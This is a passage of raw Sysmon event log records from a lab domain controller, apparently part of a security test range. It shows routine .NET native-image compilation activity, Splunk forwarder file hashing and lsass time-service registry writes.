.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020255Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:46.690{4DB9351A-A1B0-60D3-5803-00000000CF01}6492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\195c-0\Microsoft.Build.Tasks.v4.0.dll2021-06-23 21:03:46.690 23542300x800000000000000020254Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:46.503{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=215A2EDE2C788C3E86882235CED8DF64,SHA256=D071A4BE89EF90C7CFE2D8DAAAE62C0E2721EFB35DFD899C9C320E8BFFDBEB15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020277Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:47.940{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EA7EFDBAAA39ED2A65F6B1FB5B460ABA,SHA256=BE0918CF321427C7ECD37051F2201167690B3579020F051365098EB72C5B2857,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020276Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:47.800{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B3-60D3-5E03-00000000CF01}6496C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020275Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:47.784{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1B3-60D3-5E03-00000000CF01}6496C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020274Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:47.784{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B3-60D3-5E03-00000000CF01}6496C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020273Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:47.721{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B3-60D3-5D03-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020272Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:47.706{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1B3-60D3-5D03-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020271Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:47.706{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B3-60D3-5D03-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020270Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:47.690{4DB9351A-A1B3-60D3-5C03-00000000CF01}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1320-0\Microsoft.CertificateServices.Deployment.Common.dll2021-06-23 21:03:47.690 10341000x800000000000000020269Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:47.612{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B3-60D3-5C03-00000000CF01}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020268Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:47.596{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1B3-60D3-5C03-00000000CF01}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020267Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:47.596{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B3-60D3-5C03-00000000CF01}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020266Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:47.503{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18EB0E5FC62812AFAE2C52330577968D,SHA256=30F444C87AE5F6B98834B90CECC960657169B0A25A857630D63AF7D877B752F3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020265Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:47.487{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B3-60D3-5B03-00000000CF01}2680C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020264Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:47.456{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1B3-60D3-5B03-00000000CF01}2680C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020263Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:47.456{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B3-60D3-5B03-00000000CF01}2680C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020262Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:47.362{4DB9351A-A1B2-60D3-5A03-00000000CF01}2488C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\9b8-0\Microsoft.Build.Utilities.v4.0.dll2021-06-23 21:03:47.362 23542300x800000000000000020285Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:48.550{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30F5589798009C2CBF3247076230D170,SHA256=EC764E36F27ABE993192951B0AF3B23BE8E92B070DCF3E5FCC06D74312A31320,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020284Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:48.487{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B4-60D3-6003-00000000CF01}6864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020283Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:48.471{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1B4-60D3-6003-00000000CF01}6864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020282Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:48.471{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B4-60D3-6003-00000000CF01}6864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020281Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:48.049{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B4-60D3-5F03-00000000CF01}4848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020280Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:48.034{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1B4-60D3-5F03-00000000CF01}4848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020279Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:48.034{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B4-60D3-5F03-00000000CF01}4848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020278Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:48.003{4DB9351A-A1B3-60D3-5E03-00000000CF01}6496C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1960-0\Microsoft.CertificateServices.PKIClient.Cmdlets.dll2021-06-23 21:03:48.003 23542300x800000000000000020312Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:49.581{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B8A9D003A75DF4A577CA533E4F5C71E,SHA256=CB67372296DFEA9C744943F65E8F342B422A1D1F388A370F41F0766E9C38C785,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000020311Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:03:49.549{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000020310Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:03:49.549{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x000f1c78) 13241300x800000000000000020309Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:03:49.549{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7686a-0xe17f73ce) 13241300x800000000000000020308Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:03:49.549{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d76873-0x4343dbce) 13241300x800000000000000020307Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:03:49.549{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7687b-0xa50843ce) 13241300x800000000000000020306Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:03:49.549{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000020305Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 